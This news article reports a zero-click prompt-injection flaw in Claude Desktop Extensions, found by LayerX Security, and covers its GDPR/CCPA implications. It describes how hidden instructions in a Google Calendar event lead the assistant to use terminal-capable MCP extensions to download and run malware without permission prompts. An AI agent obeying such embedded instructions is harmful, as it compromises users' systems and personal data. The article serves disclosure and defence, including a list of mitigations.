A critical zero-click vulnerability in Anthropic's Claude Desktop Extensions enables attackers to deliver malware through Google Calendar events, with researchers warning the flaw violates core data protection principles under GDPR and CCPA.
Security researchers have uncovered a severe vulnerability in Anthropic's Claude Desktop Extensions (rebranded as MCP Bundles) that transforms Google Calendar into an unwitting malware distribution channel. The flaw allows attackers to execute malicious code on victims' systems without any user interaction simply by creating a poisoned calendar event.
How the Attack Works
According to Tel Aviv-based LayerX Security, the vulnerability stems from Claude's handling of external data sources combined with insufficient security boundaries. When users install MCP extensions - packaged applications that grant Claude access to other software - they create potential attack vectors. Particularly dangerous are extensions like Desktop Commander that provide terminal access.
The exploit chain begins when Claude processes a Google Calendar event containing hidden instructions. As principal researcher Roy Paz explained: "Claude will automatically process input from public-facing connectors like Google Calendar, and the AI model independently decides which installed MCP connectors to use."
This means a seemingly innocent calendar entry containing commands to download and execute malware can trigger a full system compromise when Claude processes the event. The AI interprets the instructions as legitimate tasks, bypassing all security prompts. The vulnerability earned a maximum CVSS severity rating of 10/10 due to its zero-click nature and total system access.
Regulatory Violations and Compliance Implications
This vulnerability creates significant legal exposure under major privacy regulations:
GDPR Violations (Article 32): By allowing unfettered system access without proper sandboxing, Anthropic fails to implement "appropriate technical and organizational measures" to ensure security. If exploited, attackers could access personal data, triggering mandatory breach notifications and potential fines up to 4% of global revenue.
CCPA Liability (1798.150): California's privacy law allows consumers to sue for statutory damages between $100-$750 per incident when inadequate security leads to unauthorized access. Enterprises using Claude extensions could face class actions if employee or customer data is compromised.
Anthropic's extensions hub claims extensions "run in sandboxed environments," but LayerX's analysis contradicts this. Paz notes: "Claude DXT's container falls noticeably short of what is expected from a sandbox. From an attacker's point of view it is the equivalent of setting your building code to 1234 and then leaving it unlocked."
Corporate Responsibility Shifted to Users
In a concerning development, Anthropic declined to address the flaw, stating it falls "outside our current threat model." The company's official response shifts responsibility to users: "Users maintain full control over which MCP servers they enable and the permissions those servers have."
This stance creates untenable compliance positions for businesses:
- Risk Assessment Failure: Organizations using Claude extensions cannot reasonably claim due diligence under GDPR Article 35 when the vendor acknowledges unfixed critical vulnerabilities
- Access Control Deficiencies: CCPA's requirement for "reasonable security procedures" becomes unattainable when core software deliberately bypasses permission prompts
- Supply Chain Liability: Companies integrating Claude into workflows may face regulatory action for vendor management failures
Mitigation Strategies
Given Anthropic's inaction, users and organizations should immediately:
- Audit all installed MCP extensions and remove any providing system access
- Revoke Claude's calendar integration permissions
- Implement strict Group Policy controls blocking .dxt/.mcpb files in enterprise environments
- Monitor for suspicious process execution originating from Claude's runtime
This vulnerability exemplifies the regulatory tightrope companies walk when implementing AI tools with external access. As Paz warns: "There are no hardcoded safeguards preventing Claude from constructing dangerous workflows." Until fundamental architectural changes occur, businesses risk becoming unwitting malware distribution points through seemingly benign productivity tools.
Anthropic MCP Documentation GDPR Security Requirements CCPA Security Provisions
Comments
Please log in or register to join the discussion